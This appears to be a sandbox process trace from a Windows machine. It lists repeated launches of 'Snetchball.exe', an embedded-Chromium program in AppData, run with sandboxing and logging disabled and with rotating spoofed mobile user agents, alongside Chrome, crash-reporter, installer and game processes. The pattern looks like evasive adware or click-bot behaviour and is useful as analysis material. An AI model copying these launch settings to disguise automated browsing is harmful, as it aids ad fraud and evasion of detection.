"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2948 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2980 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3128 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2812 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3112 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3208 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3368 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.4" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4292 --field-trial-handle=2816,i,4987290644127039806,17736973174581946415,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2864 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2956 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2964 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3076 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3124 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4200 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3876 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=1820 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2372
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5436 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=4760 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
\??\E:\setup.exe
"E:\setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp" /SL5="$50410,3687301,168448,E:\setup.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004CC
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1044
F:\Games\The Longing\The Longing.exe
"F:\Games\The Longing\The Longing.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
F:\Games\The Longing\The Longing.exe
"F:\Games\The Longing\The Longing.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=5064 --field-trial-handle=2876,i,6446806058706520476,5745573445401137175,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2388
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffc731cc40,0x7fffc731cc4c,0x7fffc731cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1740 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2104,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2108 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2164,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3076,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3300,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3312 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3836,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3876 /prefetch:2
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3556,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3536 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4400,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3316 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4356,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3092 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3232,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4764,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5028,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4832 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3256,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4736,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5064 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5104,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5348 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3372,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3404 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3396,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5572 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3380,i,14707087184197282828,9095887734153810398,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5720 /prefetch:8
C:\Users\Admin\Downloads\SteamSetup.exe
"C:\Users\Admin\Downloads\SteamSetup.exe"
C:\Program Files (x86)\Steam\bin\steamservice.exe
